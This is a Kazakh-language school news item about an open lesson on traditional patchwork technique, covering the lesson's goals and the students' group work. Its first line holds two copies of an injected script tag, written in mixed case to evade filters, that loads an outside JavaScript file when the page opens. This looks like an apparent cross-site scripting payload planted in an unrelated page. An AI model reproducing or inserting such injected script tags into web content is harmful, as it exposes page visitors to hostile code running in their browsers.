<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.02.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебінің дене тәрбиесі және эстетикалық пәндер әдістемелік бірлестігінде «Құрақ құрау технологиясы» тақырыбында ашық сабақ өткізілді.

Сабақтың мақсаты: құрақ құрау технологиясы туралы оқушылардың білімдерін қалыптастыра отырып, қиындыларды сәйкестендіріп құрақ түрлеріне композиция құрастыру. Қауіпсіздік ережелерімен таныстыру. Мұра болып келе жатқан құрақ құрау өнерін үйрету арқылы ұлттық тәрбие беру. Жұмыс дағдыларын дамыту.

Сабақ барысында оқушылар екі топқа бөлінді. «Жұлдыз» және «Шаршы» топтары болып жұмыс атқарды. Топтарға берілген тапсырмаларды өте тиянақты, қызығушылықпен орындады. Алдына қойған мақсаттарына жете білді. Сабақ өте қызықты өтті, оқушылар өздеріне құрақ құраудың көптеген әдіс-тәсілдерін үйренді деуге болады.

Просмотров: 665


Пікір қосу



Деректерді қолтаңбаға қосу